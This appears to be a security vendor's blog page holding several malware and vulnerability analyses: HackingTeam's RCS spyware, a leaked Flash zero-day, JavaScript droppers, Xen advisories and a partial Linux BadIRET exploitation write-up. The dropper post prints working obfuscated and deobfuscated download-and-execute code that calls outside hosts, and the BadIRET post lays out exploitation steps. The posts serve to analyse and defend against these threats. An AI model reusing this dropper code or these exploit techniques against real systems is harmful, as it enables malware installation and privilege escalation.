Skip to content
July 10, 2015 / Nick Cano

Government Grade Malware: a Look at HackingTeam’s RAT

malware2

Security researchers the world over have been digging through the massive HackingTeam dump for the past five days, and what we’ve found has been surprising. I’ve heard this situation called many things, and there’s one description that I can definitely agree with: it’s like Christmas for hackers.

“On the fifth day of Christmas Bromium sent to me a malware analysis B-L-O-G” – You

This is a very interesting situation we’ve found ourselves in. We have our hands on the code repositories of HackingTeam, and inside of them we’ve found the source code for a cross-platform, highly-featured, government-grade RAT (Remote Access Trojan). It’s rare that we get to do analysis of complex malware at the source-code level, so I couldn’t wait to write a blog about it!

The first thing I noticed when I dove into the repositories was a bunch of projects for “RCS Agents”, and each of these agents seems to be a malware core for the HackingTeam RAT called Remote Control System, or RCS.

malware1

Each of the cores is made for a different OS and, together, they comprise a multi-platform malware that works on Windows, Windows Phone, Windows Mobile, Mac OSX, iOS, Linux, Android, BlackBerry OS, and Symbian. In this blog, I’ll cover the core-win32 repository, but you can assume that the functionality in the Windows agent is present on every other platform.

Background

The code in this repository makes up a 32-bit DLL that is injected system-wide on Windows, enabling the malware to exist in the process space of many potential target applications. There’s also a core-win64 repository that contains the tools to compile this DLL for 64-bit systems.

When the DLL is injected into a process, it will unlink itself from the PEB (Process Environment Block) module list and start an IPC channel to communicate with other instances of the malware and, ultimately, to a root instance that is responsible for talking to the C&C server.

Core Functionality

RCS contains dozens of run-of-the-mill spying tools, similar to the ones found in tools like Blackshades and DarkComet. Here’s a look at the source code:

malware2

From a quick glance, we can see a number of ‘interesting’ tools:

  • HM_Pstorage.h and HM_PWDAgent (folder): grabs stored passwords from Firefox, Internet Explorer, Opera, Chrome, Thunderbird, Outlook, MSN Messenger, Paltalk, Gtalk, and Trillian.
  • HM_IMAgent.h and HM_IMAgent (folder): records conversations from Skype, Yahoo IM (versions 7 through 10), MSN Messenger (versions 2009 through 2011, now discontinued), and ICQ (version 7 only).
  • HM_SocialAgent.h and Social (folder): grabs session cookies for Gmail, Facebook, Yahoo Mail, Outlook (web client), and Twitter from Firefox, Chrome, and IE.
  • HM_MailCap.h, HM_Contacts.h, HM_MailAgent (folder) and HM_ContactAgent (folder): captures emails and contacts from Outlook and Windows Live Mail.
  • HM_AmbMic.h and HM_MicAgent (folder): records ambient noise picked up by any attached microphones.
  • wcam_grab.h and wcam_grab.cpp: periodically snap and save photos from attached webcam.
  • HM_Clipboard.h: grabs any data that is stored on the clipboard.
  • HM_KeyLog.h: logs all keystrokes.
  • HM_MouseLoh.h: logs all mouse movements and clicks.
  • HM_UrlLog.h: records visited URLs in Firefox, Chrome, IE, and Opera.

There’s nothing really novel in the code, and the methods mostly utilize standard API calls. This functionality is pretty common in most RATs, but we should consider that most of these files were checked into the repository as early as 2011, meaning RCS may have pioneered some of these features.

Some closer analysis of the code reveals that RCS does have some rarer features, though. In HM_SkypeRecord.h and HM_SkypeACL (folder), for instance, we can see that they use the DirectSound API to capture active Skype calls and save the audio using the Speex codec.

malware3

Additionally, we see that RCS can monitor printed documents (HM_PrintPool.h) and even grab private keys, balances, and transactions from Bitcoin, Litecoin, Feathercoin, and Namecoin wallets (HM_Money.h).

malware4

Luckily for us Shibe fans, they don’t seem to monitor Dogecoin wallets.

Geolocation

RCS uses the WLAN (wireless LAN) API functions from WLANAPI.DLL to enumerate nearby WiFi hotspots. Many hotspots expose geolocation information and RCS looks for this information so it can determine where the infected machine is, even when it is hiding behind a VPN or proxy.

malware5

Lateral Movement

Since HackingTeam seems to have a stockpile of 0days for lateral movement, you would think RCS wouldn’t employ any features with that specific purpose. You’d be wrong, though. They seem to have an infector that can infect USB drives, phones running Windows Mobile, and VMWare disks. This infector is located in HM_PDAAgent.h.

The USB infector is pretty standard. RCS polls for new USB drives, drops an installer on them, and infects the autorun.inf file to run that installer.

malware6-1

The Windows Mobile infector works in much the same way, copying the malware from the core-winmobile repository to the phone as a file called autorun.exe. Afterwards, it drops an infected autorun.zoo file on the phone. All of this is done using functions from the standard Windows Phone API, RAPI.DLL.

malware7

The VMWare installer is a bit trickier. First, it will search for any VMWare disks (.vmdk) that aren’t in use. When it finds one, it will mount it to an open drive letter and then drop a RCS installer in either C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ (Windows 7 and above) or C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ (Windows XP). This code is a bit too bulky to post, but it starts on line 731 of HM_PDAAgent.h, in case you get your hands on the code and want to take a look.

Self-Protection

RCS has a myriad of self-protection mechanisms, including AV detection, API call obfuscation, and API hook evasion. For starters, the AV detection is capable of detecting twenty-six different AV tools. Here’s a snippet from av_detect.h:

malware8

RCS detects these AVs either by looking for their drivers or checking the environment for certain variables. It’s smart enough to know which of its features will trigger alerts with which AVs, and will selectively disable features to remain hidden.

malware9

The malware also uses obfuscated API calls to prevent any form of static analysis from understanding what it is doing. In the file DynamiCall\obfuscated_calls.h, the malware has encoded strings that represent DLL names and API function names that it calls.

malware10

From there, DynamiCall\dynamic_import.h and DynamiCall\dynamic_import.cpp take care of decoding the strings, loading the DLLs, and resolving the addresses of the functions. Additionally, RCS has a set of API functions that it will only call if it can confirm that they aren’t being monitored: ReadProcessMemory, WriteProcessMemory, CreateRemoteThread, CreateThread, GetProcAddress, VirtualAllocEx, GetWindowText, SendMessageTimeout, and VirtualProtectEx. Every time one of these functions is called, RCS will grab the DLL that contains the function, manual-map it into memory, locate the target function in the manually-mapped library, and copy the first five bytes from the manually-mapped library over the first five bytes of the function in the actual library. If any step in this process fails, the malware will not call the function. The code that does this is pretty bulky, but you can find it in HM_SafeProcedures.h, HM_SafeProcedures.cpp, HM_PreamblePatch.h, and HM_PreamblePatch.cpp.

One of the most telling pieces of code in the malware, though, is an unfinished snippet starting on line 48 of format_resistant.cpp, which suggests the team was developing a way for RCS to persist through UEFI infection. Though the code is unfinished, it is telling of their future ambitions.

Note: Other repositories also contain some kernel-mode rootkits to hide the malware, but this blog is already getting pretty beefy.

Closing Thoughts

HackingTeam’s RCS is a fully-featured RAT with the ability to intercept large amounts of personal information, record conversations, access cameras, propagate to peripheral devices, and do it all without triggering any alarms. The source-code shows that the malware was developed by a very ambitious team, and the repository logs make it clear that it was under active development. The implications this carries are huge, especially considering HackingTeam’s customer list.

July 7, 2015 / Nick Cano

Adobe Flash Zero Day Vulnerability Exposed to Public

For those paying attention to infosec news, it’s no secret that HackingTeam – a provider of exploits and malware to governments around the world – has been hacked. The hackers who hacked the hackers released a torrent with over 400GB of internal HackingTeam software, tools, write-ups, and, of course, 0-day exploits. One of the exploits we’ve come across was first exposed by the Twitter user @w3bd3vil, and is reminiscent of the “ActionScript-Spray” attack used in CVE-2014-0322 and first documented by Bromium researcher Vadim Kotov. In summary, CVE-2014-0322 used a UAF (user after free) vulnerability in Microsoft’s Internet Explorer to increase the size of an ActionScript Vector object, giving the attacker access to the heap of the process. HackingTeam’s exploit uses this idea to achieve execution, but uses a UAF bug internal to the ActionScript 3 engine.

Note: before diving in, let’s remember that this is not a weaponized 0day, but a PoC that HackingTeam provided to customers, so we don’t have any malicious payload to accompany it; only a simple calc.exe pop.

The UAF vulnerability is quite simple. First, it sprays the heap with multiple ByteArray objects and surrounds each one with MyClass2 objects.

snip1

Spraying ByteArray and MyClass2 instances into memory

This loop iterates 30 times, effectively filling up the Array object a like so:

for i 1 to 30:

a.insert(MyClass2 instance)

a.insert (ByteArray with length 0xfa0 [4000 bytes])

a.insert (MyClass2 instance)

This spray strategically allocates a chunk of two sequential pages next to each ByteArray object, setting up ActionScript’s memory manager for exploitation. Before I dive into the code that does the exploitation, I want to give you a 10,000 foot view of how the exploit works. When a class instance is placed inside of a ByteArray, ActionScript will attempt to call the class’ member function .valueOf(), which is expected to return the actual byte to insert into the ByteArray; this is where the magic happens. ActionScript internally stores the location to the target ByteArray slot before calling .valueOf(), and it places the returned value at the stored location. In order to exploit this behavior, the attack resizes the target ByteArray from inside of .valueOf(). This causes a new chunk of memory to be allocated for the ByteArray object, freeing the old memory. Before returning, .valueOf() allocates a Vector that matches the size of the old ByteArray object. With a bit of luck (hence the 30 tries), the memory manager places the new Vector object on the freed memory from the old ByteArray. Then, when .valueOf() returns, ActionScript will write the return value directly to the length field of new Vector.

The attack iterates backwards over the sprayed ByteArray objects in a, and attempts to trigger the UAF on each one using this method. Here’s what the implementation looks like:

snip2

Attempting to trigger the vulnerability condition on the sprayed ByteArray objects

After .valueOf() returns and the ByteArray is updated, the attack loops over the list of Vector objects that it allocated (stored in _va) and checks their size. If any Vector has a size that is not 0x3f0, it means that the exploit succeeded in partially over-writing the size with the byte 0x40.

snip3

Checking the newly-allocated vector objects to see if one was affected by the exploit

From there, the attack uses the same method that was used to write the payload in CVE-2014-0322. The attack treats the affected Vector as a pointer to the entire memory space of the program (well, not the entire memory, but all memory following the Vector). It uses this to scan memory for the PE header of KERNEL32.DLL and grabs the address of VirtualProtect from the export table. Next, it overwrites the VFT (virtual function table) of an internal class with the address of VirtualProtect, and calls the function to set the memory of the MyClass2 instance directly after the affected Vector to PAGE_EXECUTE_READWRITE. With the MyClass2 memory set to executable, the attack finishes by finally placing its shellcode payload within the MyClass2 instance and using the same VFT trick to execute it.

Out of the box, this exploit comes with shellcode for Windows (both 32 and 64 bit) and Mac OSX (64 bit only). According to the documentation present in the dump, this exploit should work with every version of Flash Player from version 9 until 18.0.0.194. We’ve got it working internally with Flash Player 18 and Internet Explorer, which indicates this it is clearly a zero day risk to internet users today. Given legitimately sophisticated shellcode and mitigation bypass techniques similar to the ones documented by Bromium researcher Jared DeMott, this exploit has the potential to completely own almost any system that it hits, and can be reliably blocked by leveraging robust isolation technologies.

UPDATE 7/8/2015: It seems like Adobe has already released a patch for this vulnerability, and Flash Player versions 18.0.0.203 and above should be protected.

June 12, 2015 / Vadim Kotov

Oh look – JavaScript Droppers

In a typical drive-by-download attack scenario the shellcode would download and execute a malware binary. The malware binary is usually wrapped in a dropper that unpacks or de-obfuscates and executes it. Droppers’ main goal is to launch malware without being detected by antiviruses and HIPS. Nowadays the most popular way of covert launching would probably be process hallowing. Recently we found a couple of curious specimen that does not follow this fashion. These cases are not new, but we thought they’re worth mentioning because we’ve been seeing quite a few of those lately. One of them is the shellcode from an Internet Explorer exploit, which instead of downloading a binary executes the following CMD command:

Windows/syswow64/cmd.exe cmd.exe /q /c cd /d "%tmp%" && echo var w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var n=h(m(2),m(1),m(0));if (n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var i=0;i^<l.length;i++){v=h(m(2),l[i],k[0]);z=0;var s=g("\x41\x44\x4f\x44\x42\x2e\x53\x74\x72\x65\x61\x6d");f=a.GetTempName();s.Type=2;s.Charset="iso-8859-1";s.Open();d=v.charCodeAt(v.indexOf("PE\x00\x00")+23);x1=".\x65x\x65";s.WriteText(v);if(31^<d){z=1;f+=".dll"}else f+=x1;s.SaveToFile(f,2);z^&^&(f="regsvr32"+x1+" /s "+f);s.Close();w.run("cmd"+x1+" /c "+f,0);w1.Sleep(u*2)}}}catch(q){}df();function r(k,e){for(var l=0,n,c=[],q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&255,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&255,l=l+c[b]^&255,n=c[b],c[b]=c[l],c[l]=n,q.push(String.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&255]));return q.join("")}function su(k,e){k.setRequestHeader("User-Agent",e)}function h(k,y,j){var e=g("WinHttp.WinHttpRequest.5.1");e.SetProxy(0);e.Open("\x47E\x54",y,0);su(e,k);e.Send();if(200==e.status)return r(e.responseText,j)}function df(){a.deleteFile(w1.ScriptFullName)}function g(k){return new ActiveXObject(k)};>wtm.js && start wscript //B wtm.js "y0fz0r5qF2MT" "hxxp://mediafilled.com/?utm_source=48853" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

It’s actually a one liner that creates a JavaScript file and launches it using wscript. The de-obfuscated JavaScript code looks like this:


var w = new ActiveXObject("WScript.Shell"),
    a = new ActiveXObject("Scripting.FileSystemObject"),

try {
    rc4_key = WScript.Arguments(0)
    URL = WScript.Arguments(1)
    user_agent_string = WScript.Arguments(2)

    separator = "***";

    WScript.Sleep(360000);

    var n = request_and_decrypt(user_agent_string, URL, rc4_key);

    if (n.indexOf(separator) > 3) {
        k = n.split(separator);
        l = k[1].split(";");

        for (var i = 0; i < l.length; i++) {
            v = request_and_decrypt(user_agent_string, l[i], k[0]);
            is_dll = 0;
            var s = new ActiveXObject('ADODB.Stream');
            filename = a.GetTempName();
            s.Type = 2;
            s.Charset = "iso-8859-1";
            s.Open();

            pe_chracteristics = v.charCodeAt(v.indexOf("PE\x00\x00") + 23);
            s.WriteText(v);

            if (31 < pe_charactersistics) {
                is_dll = 1;
                filename += ".dll"
            } else {
                filename += ".exe";
            }

            s.SaveToFile(filename, 2);

            if(is_dll)
                filename = "regsvr32.exe /s " + filename);

            s.Close();

            w.run("cmd.exe /c " + filename, 0);

            WScript.Sleep(1200)

        }

    }

} catch (q) {}


a.deleteFile(WScript.ScriptFullName)


function RC4_decrpyt(k, e) {
    for (var l = 0, n, c = [], q = [], b = 0; 256 > b; b++)c[b] = b;

    for (b = 0; 256 > b; b++) l = l + c[b] + e.charCodeAt(be.length) & 255, n = c[b], c[b] = c[l], c[l] = n;

    for (var p = l = b = 0; p < k.length; p++) b = b + 1 & 255, l = l + c[b] & 255, n = c[b], c[b] = c[l], c[l] = n, q.push(String.fromCharCode(k.charCodeAt(p) ^ c[c[b] + c[l] & 255]));

    return q.join("")

}



function request_and_decrypt(user_agent_string, URL, rc4_key) {

    var request = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    request.SetProxy(0);
    request.Open("GET", URL, 0);
    request.setRequestHeader("User-Agent", user_agent_string)
    request.Send();

    if (200 == request.status)
        return RC4_decrpyt(request.responseText, rc4_key)

}

After 6-minute sleep the script will download an RC4 encrypted text file containing URLs of malware binaries. It decrypt the list and for each entry downloads, decrypts and executes the corresponding binary. The same RC4 key is used for all the downloads. Before launching a binary it checks the PE header to determine if it’s an EXE or a DLL. In ther former case it will issue:

cmd.exe /c .exe

in the latter:

regsvr32.exe /s .dll

After that the script will delete itself. We could assume certain benefits of this approach:

  1. It might trick some HIPS or pro-active AV modules
  2. The binaries are encrypted – therefore the chances of network detection are scarce
  3. The URLs of malicious binaries are not hardcoded – they are easily configurable

Interestingly we saw a similar dropper in an EXE as well. A fake Flash Player installer from hxxp://twitclh.tv/berterofficial/v/5474368/ is an EXE that shows clean on VirusTotal (permalink). It creates a JavaScript file and batch script. Here’s the de-obfuscated JavaScript:


(function(c) {
    function a(a, b) {
        if (!b || !a) return null;
        b = e["ExpandEnvironmentStrings"](b);
        var d = WScript.CreateObject("Msxml2.XMLhttp");
        d.open("GET", a, !1);
        d.send(null);
        var c = new ActiveXObject("ADODB.Stream");
        with(c) return Mode = 3, Type = 1, Open(), Write(d["responseBody"]), SaveToFile(b, 2), Close(), b
    }

    fso = new ActiveXObject("Scripting.FileSystemObject");
    var e = new ActiveXObject("WScript.Shell");
    c = new ActiveXObject("Shell.Application" );
    FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");

    a("https://copy.com/kH0joqRbalvYJHgV", "%APPDATA%\\7winzip.exe");
    a("https://copy.com/ZNkwaUExZCdlxsXV", "%APPDATA%\\wilndfiles");
    a("https://copy.com/sWvTey97XnV3R87g", "%APPDATA%\\wilndfile.cmd");
    a("https://copy.com/OXqMLsoKtDXcrQp0", "%APPDATA%\\wilndfiler.cmd");

    c.ShellExecute("cmd.exe", '/c"' + FileDestr + 'wilndfile.cmd"', "", "runas", 0);
    c.ShellExecute("cmd.exe", '/c"' + FileDestr + 'wilndfiler.cmd"', "", "runas", 0);

})(this);

It downloads 4 files from copy.com and notice that these are HTTPS connections again rendering traffic filters useless. The files are:

  1. exe – a instance of 7zip
  2. wilndfiles – a password protected 7z archive
  3. cmd – a batch script
  4. cmd – a batch script

After that it executes both scripts. First one unpacks the archive and launches malware, second – cleans up all the dropper related files. Is this method more beneficial than more traditional droppers? It appears so. Instead of making more sophisticated PE droppers it seems rational to just switch to JavaScript and use PE as a “dropper” for javascript. Given 0 positives on Virus Total it seems antiviruses do not scrutinize them too well. Of course VirusTotal doesn’t do justice to the antiviruses. Some of them have HIPS modules and various heuristics and could possibly detect it. But still none of them had a signature for this dropper, not even generic one and this should be alarming.

May 13, 2015 / Jared DeMott

The Floppies Won’t Eat Your Mouse

We heard tell of a mean ol’ venom on the street (CVE-2015-3456).  “Hey, give that back to Spidey.”

 venom1

So we decided to have a look.  But we’re not talking about superheroes.  We’re talking about floppy.  Remember this fella?

venom2

He seems bummed out.  That’s because there’s not much need for him anymore.  Or so we thought.  Let’s give it over to the expert:

venom3

“Thank you Captain.  Indeed certain hypervisors may still include code, which enables the use of this primitive alien technology, known as the “floppy”.  As expected, federation level technologies (Bromium) removed such useless code to begin with.  (E.g. vSentry is not at all vulnerable.)

The source code file that holds the vulnerability is fdc.c.  Here is the detailed code flaw and fix:

http://xenbits.xen.org/xsa/xsa133-qemut.patch

Though it has not been observed, it appears that rogues with system level privileges in a VM could escape to host, if the vulnerable code were compiled in.  Estimating impact is non-trivial as always.  Most of the risk is in the cloud, and details about the exact compiled version of their hypervisor are unlikely to surface.  Either way, providers will react to this threat quickly.  Thus, real world impact is not expected at this time.”

Now back to our regularly scheduled program.

P.S. This bug was found by Jason Geffner – Great job!

April 1, 2015 / Nick Cano

The ABC’s of APT

Here at Bromium Labs, we’re always striving to further our knowledge of the rapidly-changing attack landscape that threatens our enterprise customers. Over the past few months, our dedicated team of researchers have collectively developed a severe chemical dependency on caffeine in search of a paradigm to clearly define this landscape in a way that could benefit the security community as a whole. What they came up with is truly groundbreaking, and will go down in history as “The ABC’s of APT.”

ABC's of APT

Image CopyWronged© By Bromium Labs

As we all know, the term APT refers to an “Advanced Persistent Threat.” In our research, we realized each APT has unique behavior, and casting them all under one umbrella can be a slippery slope towards people marrying their television sets. For this reason, we devised our own paradigm that strips the broad term “APT” from threat diagnoses and, instead, categorizes them using a more specialized spectrum. Surprisingly, this spectrum happens to encompasses twenty-six different distinct behaviors – each of which can be represented using one letter of the alphabet. And, thus, The ABC’s of APT were born. Without further blabbering, here’s our finished diagnosis table:

Read more…

March 12, 2015 / Vadim Kotov

Achievement Locked: New Crypto-Ransomware Pwns Video Gamers

Gamers may be used to paying to unlock downloadable content in their favorite games, but a new crypto-ransomware variant aims to make gamers pay to unlock what they already own. Data files for more than 20 games can be affected by the threat, increasing what is already a large target for cybercriminals. Another file type that hasn’t been targeted before is iTunes related. But first, let’s have a look at the initial infection.

Read more…

March 10, 2015 / Rafal Wojtczuk

The five Xen Security Advisories from March 2015 and Bromium vSentry

Five Xen hypervisor security advisories – XSA-120, XSA-121, XSA-122, XSA-123 and XSA-124 have been published recently. Let’s have a look how they relate to the Bromium vSentry hypervisor, uXen, that has been derived from Xen.

Summary of impact on uXen

XSA-120 – not vulnerable
XSA-121 – minor data disclosure
XSA-122 – minor data disclosure
XSA-123 – not vulnerable
XSA-124 – not vulnerable

XSA-120 and XSA-124

These vulnerabilities are related to PCI-passthrough functionality. If a malicious VM has been granted direct access to a PCI device, it can crash the host. Currently, in Bromium vSentry we do not pass any PCI devices to any VM, therefore these vulnerabilities are not relevant.

XSA-121

The code responsible for emulation of some hardware (e.g. real-time clock, interrupt controller) refuses to handle unexpected requests from the VM. Unfortunately, the upper layers of the emulator still return 4 bytes of uninitialized data to the VM, despite the fact that this location has not been filled by the lower layer of the code. This results in a limited information disclosure – four bytes from the hypervisor address space are disclosed to the VM. These four bytes reside in the hypervisor stack. Therefore, the impact is minimal – the only information useful for an attacker is the partial value of pointers residing on the stack. This is not interesting by itself, but it might be helpful when exploiting another (unrelated) vulnerability based on memory corruption, because it makes ASLR protection ineffective.
uXen is potentially vulnerable to this issue.

XSA-122

This issue is very similar to XSA-121. This time, limited information disclosure of the contents of the hypervisor’s stack occurs when handling the “xen_version” hypercall. The impact is also identical to XSA-121 (the difference is that more than 4 bytes can be disclosed).
uXen is potentially vulnerable to this issue.

XSA-123

This is the most interesting one of the four, because this is a hypervisor memory corruption. The discoverer’s analysis is here; the below independent analysis is essentially the same, with a few extra bits on the CPU0 case.
The vulnerability lies in the code responsible for instruction emulation. The Xen emulator maintains the following data structure (C union):
union {
/* OP_REG: Pointer to register field.*/
unsigned long *reg;
/* OP_MEM: Segment and offset. */
struct { enum x86_segment seg; unsigned long off; } mem;
};

If the instruction accesses memory, then the “mem” field of the union should be used. If the instruction accesses a register, then the “reg” pointer should be used – it points to the stored register on the hypervisor stack. The problem arises when Xen emulates an instruction that does not access memory, but is prefixed by the segment override prefix (naturally, such a combination does not make sense). In such case, the “reg” pointer is first initialized to a legal location, but then the “mem.seg” field is also written to. As both fields (“reg” and “seg”) share the same location (this is how C unions work), the result is that the “reg” pointer is corrupted. Subsequently, this pointer is read or written to with a controllable value.
The crucial limitation is that the “reg” pointer is 8 bytes long (assuming x86-64 architecture) and the “seg” field is 4 bytes long (unless “–short-enums” option is passed to the compiler, but it seems to not be the case at least by default). It means that only the low 4 bytes of “reg” can be controlled, and with a very limited range of values. The biggest possible value of “enum x86_segment” type, that can be a prefix, is 5. If the original value of “reg” was 0xXXXXXXXXYYYYYYYY, we can turn it to 0xXXXXXXXX0000000Z, where Z is in 0-5 range (and the high 32 bits are unchanged). Initially, the “reg” field points to the hypervisor stack. In order to understand the impact, we need to know the possible ranges of the hypervisor stack locations. The following information was gathered on Xen-4.4.1 x86-64 system (particularly, the file xen-4.4.1/xen/include/asm-x86/config.h is very helpful). There are two cases:
1) An attacker controls a VM that can run on physical CPU 0. The stack for CPU 0 resides in the Xen image bss section, so it is located at an address a bit higher than 0xffff82d080000000. After overwrite, this pointer will have the value 0xffff82d00000000Z (again, 0<=Z<=5). This virtual address is mapped and belongs to the compatibility machine-to-phys translation table. This data structure is used only for PV VMs (while the vulnerability can only be triggered from a HVM), therefore (most likely) an attacker needs to control both a PV VM and a HVM to proceed. Even in this case, it is unclear how an ability to control the first entry in machine-to-phys translation table can help an attacker.
2) An attacker controls a VM that cannot run on physical CPU 0. Hypervisor stacks for CPUs other than 0 are allocated on the Xen heap. The typical address of the stack top is 0xffff830000000000+physical_memory_size-something_small, because memory for CPU stacks are allocated early at the Xen boot time, from the top of physical memory (and all physical memory is mapped at the virtual address 0xffff830000000000). After the vulnerability is triggered, the “reg” pointer will have the value 0xffff830V0000000Z, where again 0<=Z<=5, and V=(int)(physical_memory_size_in_GB/4.0). This address is mapped to a single physical frame that can serve any purpose – e.g. can be used by dom0 kernel to store crucial pointers. However, it is nontrivial for a malicious VM to force the hypervisor to allocate this frame in a way that would result in reliable privilege escalation. On the other hand, uncontrolled memory corruption in another VM (limited to a single page) is likely.
The good news is that uXen is not vulnerable to this issue. We identified the Xen instruction emulator as a possible attack target a long time ago, and its functionality in uXen is severely limited. Particularly, uXen (when running a microVM) refuses to emulate an instruction with a segment override – if such an instruction is seen, the microVM is killed.

February 2, 2015 / Rafal Wojtczuk

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)

Introduction


CVE-2014-9322
is described as follows:

 
arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
properly handle faults associated with the Stack Segment (SS) segment
register, which allows local users to gain privileges by triggering an IRET
instruction that leads to access to a GS Base address from the wrong space. 

It was fixed on 23rd November 2014 with this commit.
I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there.
All experiments were conducted on Fedora 20 system, running 64bit 3.11.10-301 kernel; all the discussion is 64bit-specific.

Short results summary:

  1. With the tested kernel, the vulnerability can be reliably exploited to achieve kernelmode
    arbitrary code execution.

  2. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution.

Digression: kernel, usermode, iret

The vulnerability

In a few cases, when Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to bad_iret function, that does

     /* So pretend we completed the iret and took the #GPF in user mode.*/
     pushq $0
     SWAPGS
     jmp general_protection

As the comment explains, the subsequent code flow should be identical to the case when
general protection exception happens in user mode (just jump to the #GP handler). This works well in case of most of the exceptions that can be raised by iret, e.g. #GP.

The problematic case is #SS exception. If a kernel is vulnerable (so, before kernel version 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – “push” instruction generates a page fault that gets converted into double fault. I have not analysed this scenario; from now on, we focus on pre 3.16 kernel, with no “espfix”.

The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. In comparison with e.g. #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the below paragraph, otherwise skip it.

Digression: swapgs instruction

When memory is accessed with gs segment prefix, like this:

mov %gs:LOGICAL_ADDRESS, %eax

the following actually happens:

  1. BASE_ADDRESS value is retrieved from the hidden part of the segment register
  2. memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced

The base address is initially derived from Global Descriptor Table (or LDT). However, there are situations where GS segment base is changed on the fly, without involving GDT.

Quoting SDM:
“SWAPGS exchanges the current GS base register value with the value contained
in MSR address C0000102H
(IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction
intended for use by system software. (…) The kernel can then use the GS prefix on
normal memory references to access [per-cpu]kernel data structures.”
For each CPU, Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure address. Therefore, the usual pattern of e.g. syscall handler is:

  1. swapgs (now the gs base points to kernel memory)
  2. access per-cpu kernel data structures via memory instructions with gs prefix
  3. swapgs (it undos the result of the previous swapgs, gs base points to usermode memory)
  4. return to usermode

Naturally, kernel code must ensure that whenever it wants to access percpu data with gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is noneven (so that gs base points to kernel memory).

Triggering the vulnerability

By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, kernel will try to access important data structures with a wrong gs base, controllable by the user.
When is #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of iret instruction, it says:

 64-Bit Mode Exceptions:
 #SS(0)
 If an attempt to pop a value off the stack violates the SS limit.
 If an attempt to pop a value off the stack causes a non-canonical address
 to be referenced.

None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present:

IF stack segment is not present
THEN #SS(SS selector); FI;

So, in usermode, we need to set ss register to something not present. It is not straighforward: we cannot just use

mov $nonpresent_segment_selector, %eax
mov %ax, %ss

as the latter instruction will generate #GP. Setting the ss via debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64bits system (it might work on 32bit, though). The solution is:

  1. thread A: create a custom segment X in LDT via sys_modify_ldt syscall
  2. thread B: ss:=X_selector
  3. thread A: invalidate X via sys_modify_ldt
  4. thread B: wait for hardware interrupt

The reason why one needs two threads (both in the same process) is that the return from the syscall (including sys_modify_ldt) is done via sysret instruction that hardcodes the ss value. If we invalidated X in the same thread that did “ss:=X instruction”, ss would be undone.
Running the above code results in kernel panic. In order to do something more meaningful, we will need to control usermode gs base; it can be set via arch_prctl(ARCH_SET_GS) syscall.

Achieving write primitive

If we run the above code, then #SS handler runs fine (meaning: it will not touch memory at gs base), returns into bad_iret, that in turn jumps to #GP exception handler. This runs fine for a while, and then calls the following function:

289 dotraplinkage void
290 do_general_protection(struct pt_regs *regs, long error_code)
291 {
292         struct task_struct *tsk;
...
306         tsk = current;
307         if (!user_mode(regs)) {
                ... it is not reached
317         }
318 
319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;
321 
322         if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) &&
323                         printk_ratelimit()) {
324                 pr_info("%s[%d] general protection ip:%lx sp:%lx
error:%lx",
325                         tsk->comm, task_pid_nr(tsk),
326                         regs->ip, regs->sp, error_code);
327                 print_vma_addr(" in ", regs->ip);
328                 pr_cont("\n");
329         }
330 
331         force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk);
332 exit:
333         exception_exit(prev_state);
334 }

It is far from obvious from the C code, but the assignment to tsk from current macro uses memory read with gs prefix. Line 306 is actually:

0xffffffff8164b79d :	mov    %gs:0xc780,%rbx

This gets interesting. We control the “current” pointer, that points to the giant data structure describing the whole Linux process. Particularly, the lines

319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;

are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are 0 and 0xd constants, respectively), but this should not be a problem. Game over ?

Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps:

  1. prepare usermode memory at FAKE_PERCPU, and set gs base to it
  2. Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET= X – offsetof(struct task_struct, thread.error_code)
  3. trigger the vulnerability

Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. unhandled_signal() function dereferences a pointer from task_struct. We have no control what lies beyond X, and the result will be a page fault in kernel.
How can we cope with this? Options:

